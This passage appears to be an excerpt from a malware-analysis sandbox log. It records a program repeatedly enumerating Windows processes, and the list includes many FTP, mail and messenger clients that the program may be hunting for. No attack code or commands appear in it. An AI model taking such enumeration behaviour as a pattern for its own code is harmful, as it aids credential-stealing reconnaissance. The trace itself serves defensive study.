| out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0165.033] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0165.035] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0165.036] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0165.038] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0165.040] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0165.042] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0165.044] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0165.048] CloseHandle (hObject=0x1ed4) returned 1 [0165.048] Sleep (dwMilliseconds=0x64) [0165.163] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c64 [0165.175] Process32First (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.177] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0165.178] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0165.180] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0165.182] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0165.183] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0165.185] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0165.187] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0165.188] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0165.190] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.192] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.193] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0165.216] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.219] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.294] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.295] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.298] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.299] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.301] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.303] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0165.304] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0165.306] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0165.308] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0165.309] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.311] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0165.313] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0165.314] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0165.316] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0165.317] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0165.319] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0165.320] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.323] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0165.324] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0165.327] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0165.366] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0165.368] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.370] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0165.372] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0165.373] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0165.375] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0165.378] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0165.379] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0165.381] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0165.383] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0165.385] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0165.387] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0165.388] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0165.390] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0165.391] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0165.393] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0165.394] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0165.396] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0165.397] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0165.399] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0165.400] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0165.405] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0165.406] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0165.408] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0165.410] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0165.412] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0165.414] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0165.416] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0165.418] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0165.420] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0165.422] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0165.425] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0165.427] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0165.429] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0165.431] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0165.433] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0165.435] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0165.438] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0165.442] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0165.444] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0165.446] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0165.448] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0165.449] Process32Next (in: 